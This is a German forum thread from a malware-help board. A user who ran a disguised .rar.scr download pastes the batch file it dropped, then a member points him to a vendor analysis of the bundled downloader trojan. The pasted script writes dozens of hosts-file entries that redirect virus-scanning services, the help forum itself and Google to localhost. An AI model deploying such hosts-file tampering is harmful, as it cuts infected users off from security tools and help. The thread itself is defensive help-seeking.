Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Brauche jemanden der ne exe datei für mich checken kann plz (https://www.trojaner-board.de/73278-brauche-jemanden-ne-exe-datei-mich-checken-plz.html)

PepeMasta 18.05.2009 21:02

Brauche jemanden der ne exe datei für mich checken kann plz
 
Hi hab folgendes problem:

wollte mir vorher ein album runterladen, hab aber nicht bemerkt, dass die endung der datei name.rar.scr ist. so draufgeklickt virenmeldung bekommen... klasse was machst jetzt hab ich mal geschaut regedit geht noch taskmanager auch also denk ich mal das es ned so schlimm sein wird. so jetzt hab ich mir meine datei näher angeschaut und bin drauf gekommen das genau zwei dateien drin sind eine antikinder.bat datei die wie folgt lautet:

echo 127.0.0.1 www.virustotal.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.virustotal.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://virustotal.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 virustotal.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.scanner.virus.org >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.scanner.virus.org >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://scanner.virus.org >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 scanner.virus.org >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.virusscan.jotti.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.virusscan.jotti.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://virusscan.jotti.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 virusscan.jotti.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.trojaner-board.de/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.trojaner-board.de/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://trojaner-board.de/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 trojaner-board.de/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.anubis.iseclab.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.anubis.iseclab.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://anubis.iseclab.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 anubis.iseclab.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.3dl.am >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.3dl.am >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://3dl.am >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 3dl.am >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.de >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.google.de >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://google.de >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 google.de >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.google.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://google.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 google.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.at >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.google.at >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://google.at >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 google.at >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.ch >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.google.ch >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://google.ch >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 google.ch >> %systemroot%\system32\drivers\etc\hosts

da hab ich jetzt einfach die hosts datei aus dem ordner gelöscht, weil bei mir google nich mehr ging jetzt funktionierts wieder. jetzt war da noch ne 123.exe mit drin ich würd nur gern wissen ob die einer checken kann was se genau macht und was ich dann alles dagegen tun muss. das wär echt spitze.
ich lad die datei gleich hoch ich werde den link dann auf anfrage schicken möchte hier ja keinen virus oder sonst was verteilen.

danke schon mal
gruß pepe

space23 18.05.2009 21:09

Zitat:

wollte mir voher ein album runterladen, hab aber nicht bemerkt, dass die endung der datei name.rar.scr ist. so draufgeklickt virenmeldung bekommen...
Also wenn du dir von irgendeiner illegalen Warez Seite (:pfui:) ein Album runterlädst, wird dir wohl kaum einer helfen sorry!!!

Trotzdem hab ich mal Mitleid und gib dir diesen Link:

http://www.sophos.com/security/analy.../trojvbgx.html

Da siehste was 123.exe ist.

Gruß space

space23 18.05.2009 21:16

Sorry hier nochmal das gleiche in Deutsch:

Troj/VB-GX Trojaner (Trojan.Win32.VB.xt, Download.Trojan, TROJ_VB.DT) - Sophos Sicherheitsanalyse

PepeMasta 18.05.2009 21:17

woher weißte das ohne überhaupt die datei gesehen zu haben?

space23 18.05.2009 21:18

Zitat:

jetzt war da noch ne 123.exe mit drin ich würd nur gern wissen ob die einer checken kann was se genau macht
Genau das hab ich gemacht.

Zitat:

Troj/VB-GX ist ein Downloader-Trojaner für die Windows-Plattform, der versucht, eine ausführbare Datei mit dem Namen 123.exe von einem vordefinierten remoten Speicherort herunterzuladen.
Gruß space

PepeMasta 18.05.2009 21:20

ich hab dir die datei doch noch nicht mal geschickt??

jetzt bin ich verwirrt das kann ja sonst was für ne datei sein

space23 18.05.2009 21:24

Du hast gefragt jemand soll checken was die macht und auf

Troj/VB-GX Trojaner (Trojan.Win32.VB.xt, Download.Trojan, TROJ_VB.DT) - Sophos Sicherheitsanalyse

wirds dir doch ausführlich erklärt musst halt nur lesen :daumenhoc

Gruß space


Alle Zeitangaben in WEZ +1. Es ist jetzt 08:56 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19